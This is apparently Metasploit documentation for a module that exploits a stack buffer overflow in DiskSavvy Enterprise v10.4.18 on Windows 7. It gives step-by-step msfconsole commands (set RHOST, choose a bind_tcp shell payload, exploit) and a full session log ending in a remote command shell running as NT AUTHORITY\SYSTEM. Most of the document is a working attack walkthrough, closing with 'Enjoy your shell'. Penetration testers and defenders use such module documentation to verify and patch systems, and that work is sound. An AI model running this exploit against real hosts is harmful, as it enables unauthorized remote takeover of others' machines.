CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Vulnerable Application

DiskSavvy Enterprise version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at DiskSavvy Enterprise.

Verification Steps

1. Install a vulnerable DiskSavvy Enterprise

2. Start msfconsole

3. Do use exploit/windows/misc/disk_savvy_adm

4. Do set RHOST ip

5. Do set PAYLOAD windows/shell/bind_tcp

6. Do exploit

7. Enjoy your shell

Scenarios

DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86

msf > use exploit/windows/misc/disk_savvy_adm 
msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
RHOST => 192.168.216.55
msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(windows/misc/disk_savvy_adm) > exploit 

[*] Started bind handler
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.216.55
[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami      
whoami
nt authority\system

C:\Windows\system32>